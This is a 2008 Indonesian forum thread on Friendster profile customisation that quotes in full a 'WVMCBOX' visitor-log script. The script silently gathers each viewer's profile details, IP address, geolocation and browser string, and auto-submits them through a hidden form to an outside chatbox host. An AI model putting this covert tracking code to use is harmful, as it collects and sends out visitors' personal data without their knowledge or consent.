[/quote]
gpp.. okei diganti aja gpp kok
[/quote]
Maksudnya bikin siggy yg gimana nih?[quote=ymm0t]Ato ga kode buat ngoblok viewer kalo dia pke IE....
Soalnya di IE profilku jadi beda 180 derajat ama d FF.....[/quote]
Siapapun jawab dong!
[b]edited: Dah dapet kok scriptnya.. Heheh[/b]
Last edited by ymm0t (2008-07-01 21:10:29)
[quote=diva_23700]hai all mo tanya nich???
gimana yach caranya cara kasih visitor?????
dulu aq pernah kasih tapi unregister id????
minta solisinya donx!!![/quote]
cuba kesini mbag [url=http://theftalk.com/t19440-%7BTUTORIAL%7D-Modifikasi-WVM-2.1-%28updated-12-05-08%29.html]WVM 2.1[/url] d stu ga make regis�an
Last edited by Co_don SanAdH (2008-07-01 21:11:36)
brotha nanya nich (pasti nya, masa mo tidur )
gue punya masalah nich ama CSS yang slalu membuad hidupku sengsara .. hiks
gini pertanyaan
1. gmana agar box content satu ama yang laen jarak nya rada jauh gitu ... bsa gag ??
2. gmana spaya tulisan d more about me ntu jga antara spasi (paragraph ) satu ama yang laen jga rada jauh .. soal nya punya gue begh, ntu huruf2 na kek dah mau nikah .. cari pasangan ampe dampingan gitu atas bawah ...
nb : bagi orang yang pertama menjawab pertanyaan saya, akan mendapat ucapan trimakasih dengan [b]san[/b]g[b]ad[/b] (kok mirip nick mu bro donn ??) dari saya ...

Bang mw tanya lagi.....
[quote]/*IP n Location original by Nopathz*/
var geonopz = document.createElement("script");
geonopz.type = "text/javascript";
geonopz.src = "http://gd.geobytes.com/gd?after=-1&variables=GeobytesIpAddress,GeobytesCity,GeobytesRegion,GeobytesCountry";
document.getElementsByTagName("head")[0].appendChild(geonopz);
/**
* WVMCBOX version 2.3
* Author: FeRuZZ � http://profiles.friendster.com/feruzz
* Timestamp: GMT+8 10.15PM April 16, 2008
* free to use but not free to resell
**/
if (!attachOnLoadHandler(function() { WVMCBOX.init();})) window.onload = function() { WVMCBOX.init();};
var WVMCBOX;
if (typeof WVMCBOX == "undefined" || !WVMCBOX) { WVMCBOX = window.WVMCBOX || {}; }
(function() {
WVMCBOX = {
//private property
div: null,
//date: Date().replace(/\(.+\)/, ""),
ifstyle: [
"100%", //width
"490", //height
"auto", //scrolling
"yes" //allowtransparency
],
base: {
"cboxdiv": ["xxx","xxxxxx","xxxx"]
},
//null if not exist
details: {
shoutout:null,
gender: null,
age: null,
status: null,
location: null,
seek: null,
since: null,
profileViewed: null
},
//get viewer details
regexp: {
shoutout: /shoutouttxt"\s*style="padding\:\s*0px;\s*margin\:\s*0px;">([\S\s]*?)<\/span>/i,
gender: /q">([\S]*male)/i,
age: /male,\s*([\d]*),/i,
status: /male,\s*[\d]*,\s*([\S\s]*?)<\/span>/i,
location: /Location\:\s*<\/span><a[\S\s]*?>([\S\s]*?)<\/a><\/li>/i,
seek: /Interested\s*In\:\s*<\/span>([\S\s]*?)<\/li>/i,
since: /Member\s*Since\:\s*<\/span>([\S\s]*?)<\/li>/i,
profileViewed: /\/profilehistory\.php">([\S\s]*?)<\/a>/i
},
init: function() {
WVMCBOX.ajaxRequest("GET", "http://" + location.hostname + "/" + pageViewerID, true, null, WVMCBOX.viewer, null);
setInterval("window.wvm_submit.location.href=document.getElementById('wvm_submit').src", 200000);
},
viewer: function(htm) {
if (htm.replace(/^\s*|\s*$/g,"") === "") {
alert("ERROR: Empty xmlresponse! \n Unable to parse your details!");
return;
}else if (htm) {
for (var val in WVMCBOX.details) {
try {
WVMCBOX.details[val] = new RegExp(WVMCBOX.regexp[val]).exec(htm)[1];
}catch(e) {
WVMCBOX.details[val] = "";
}
}
var status = WVMCBOX.details.status;
switch (status) {
case "":
status = "Its Complicated";
break;
}
var seek = WVMCBOX.details.seek;
switch (seek) {
case "":
seek = "Just looking around";
break;
}
if (WVMCBOX.details.shoutout == "") {
WVMCBOX.details.shoutout = "no shoutout";}
for (var seeboks in WVMCBOX.base) {
var htmlspaces = "&nb"+"sp;";
var htmlbulls = "&bu"+"ll;";
WVMCBOX.div = "<iframe frameborder=\"0\" width=\"" + WVMCBOX.ifstyle[0] + "\" height=\"" + WVMCBOX.ifstyle[1] + "\" scrolling=\"" + WVMCBOX.ifstyle[2] + "\" allowtransparency=\"" + WVMCBOX.ifstyle[3] + "\" marginheight=\"2\" marginwidth=\"2\" src=\"http://" + WVMCBOX.base[seeboks][0] + ".cbox.ws/box/?boxid=" + WVMCBOX.base[seeboks][1] + "&boxtag=" + WVMCBOX.base[seeboks][2] + "&sec=main\" name=\"wvm_submit\" id=\"wvm_submit\"></iframe>"+
"<div style=\"display:none\">" +
"<form name=\"wvmcboxform\" id=\"wvmcboxform\" target=\"wvm_submit\" action=\"http://" + WVMCBOX.base[seeboks][0] + ".cbox.ws/box/?boxid=" + WVMCBOX.base[seeboks][1] + "&boxtag=" + WVMCBOX.base[seeboks][2] + "&sec=submit\" method=\"POST\">" +
"<input type=\"text\" name=\"nme\" value=\"" + pageViewerFName + "\">" +
"<input type=\"text\" name=\"eml\" value=\"http://profiles.friendster.com/" + pageViewerID + "\">"+
"<textarea style=\"overflow:hidden\" class=\"cboxMsgArea\" maxlength=\"500\" cols=\"22\" rows=\"3\" name=\"pst\">" + WVMCBOX.details.gender + "," + htmlspaces + "" + WVMCBOX.details.age + "," + htmlspaces + "" + status +
"[br]" + htmlbulls + "" + htmlspaces + "" + WVMCBOX.details.since.replace(/^\s*[\w]*?/gi,"Member Since: ") +
"[br]" + htmlbulls + "" + htmlspaces + "Interested" + htmlspaces + "In:" + htmlspaces + "" + seek +
"[br]" + htmlbulls + "" + htmlspaces + "" + WVMCBOX.details.location.replace(/^\s*[\S\s]*?/gi,"Location: ") +
"[br]" + htmlbulls + "" + htmlspaces + "" + WVMCBOX.details.profileViewed.replace(/^\s*[\S\s]*?/gi, "Profile Viewed: ") +
"[br]" + htmlbulls + "" + htmlspaces + "Browser:" + htmlspaces + "" + navigator.userAgent +
"[br]" + htmlbulls + "" + htmlspaces + "IP :" + htmlspaces + "" +sGeobytesIpAddress+"[br]"+sGeobytesCity+", "+sGeobytesRegion.split("(",1)+
"[br]"+sGeobytesCountry+
"[br][br]"+WVMCBOX.details.shoutout+
"</textarea>" +
"</form>"+
"</div>"+
"<div align='center' style='text-align:center;'><form name='sibok' target='wvm_submit' action='http://"+WVMCBOX.base[seeboks][0]+".cbox.ws/box/?boxid="+WVMCBOX.base[seeboks][1]+"&boxtag="+WVMCBOX.base[seeboks][2]+"&sec=submit' method='post' onsubmit='checkform()'><input type='hidden' name='nme' value='"+pageViewerFName.replace(/"/g, "").replace(/'/g, "")+"'><input type='hidden' name='eml' value='http://profiles.friendster.com/"+pageViewerID+"'><br><input type='text' name='pst' size='9' maxlength='200' style='width:130px; height:22px; border:1px solid; border-color:#999; padding-right:2px;' value='post here' onfocus=\"frmfocus(this, 'post here')\" onblur=\"frmblur(this, 'post here')\"><input type='submit' class='mybutton' value='Send' name='submit'></form><br><br></div>";
[b]addBox(pageOwnerFName+"'s Visitorlog","<div id=\""+seeboks+"\" align=\"center\">"+WVMCBOX.div+"</div>","wvmcbox",/commonbox[\s]*?groups/i);[/b]
}
if((pageViewerID != pageOwnerID) && (pageViewerID !== "")) {
try {
document.wvmcboxform.submit();
}catch(e) {
document.getElementById("wvmcboxform").submit();
}
}
}
},
ajaxRequest: function(type, url, cont, param, func, handlerparam) {
/*
* ajaxRequest function
* version: 2.1
* Copyright: FeRuZZ � http://profiles.friendster.com/feruzz
*
* @type: "GET" | "POST"
* @cont: true | false
* @param: param | null
*/
var httprequest = null;
var msxml = ["Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0", "Msxml2.XMLHTTP", "Microsoft.XMLHTTP"];
for (var x = 0, len = msxml.length; x < len; x++) {
try {
httprequest = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject(msxml[x]);
break;
} catch(e) {
httprequest = null;
}
}
if (typeof func === "function") {
httprequest.onreadystatechange = function() {
if (httprequest.readyState === 4) {
if (httprequest.status === 200) {
func(httprequest.responseText, handlerparam);
}
}
};
}
httprequest.open(type, url, cont);
httprequest.setRequestHeader("ajaxRequest", "true");
httprequest.setRequestHeader("X-Requested-With", "XMLHttpRequest");
if (type === "POST") {
var contentLength = param ? param.length: 0;
httprequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httprequest.setRequestHeader("Content-length", contentLength);
if (httprequest.overrideMimeType) {
httprequest.setRequestHeader("Connection", "close");
}
}
httprequest.send(param);
}
};
})();
function checkform(){
var f=document.sibok;
if(f.pst.value=="Tulis pesan disini"){
alert("Where's ur message??");
f.pst.focus();
return false;
}
return true;
}
function frmfocus(x,y){
(x.value==y)?x.value="":void (0);
}
function frmblur(x,y){
(x.value=="")?x.value=y:void (0);
}[/quote]
Yg di bold itu pke addbox function yg beda dari saya.... Saya pke WVMe 2.1 Accordion yg buatan Bang Nophz.....
Bisa tolong ubah kode addboxnya gx?
jarak atas bawahnya apa kanan kirinya
kalo untuk yg no. 2 bisa d akalin dengan ngisi sendiri
pakek ini
[quote]document.getElementById("content_6").innerHTML="PUT ANYTHING HERE";[/quote]
misal
[quote]document.getElementById("content_6").innerHTML="<div align='center'>"+
"<li>blablabla apa ajah bisa segala tetek bengek HTML </li>"+
"<li>blablabla apa ajah bisa segala tetek bengek HTML </li>"+
"<li>blablabla apa ajah bisa segala tetek bengek HTML </li>"+
"<li>blablabla apa ajah bisa segala tetek bengek HTML </li>"+
"<li>blablabla apa ajah bisa segala tetek bengek HTML </li>"+
"<li>blablabla apa ajah bisa segala tetek bengek HTML </li>"+
"<li>blablabla apa ajah bisa segala tetek bengek HTML </li></div>";[/quote]
begitulah kira� bro Q
apa bukan?
[b]@ ymm0t[/b]
coba begini mas
<">[b]
@ cowo chupu[/b]
waduh gw ga tau mas
gw ga pernah buad siggy
Last edited by Co_don SanAdH (2008-07-01 21:35:35)
[/quote]
Tapi ini rahasia yah....
Sorry double posting.... Tadi ktnya thread nya erro jadi saya refresh dan beginilah jadinya...
Saya jangan di apa2 in ya mod....
Last edited by ymm0t (2008-07-01 21:43:21)
[/quote]
Tapi ini rahasia yah....
Last edited by ymm0t (2008-07-01 21:44:31)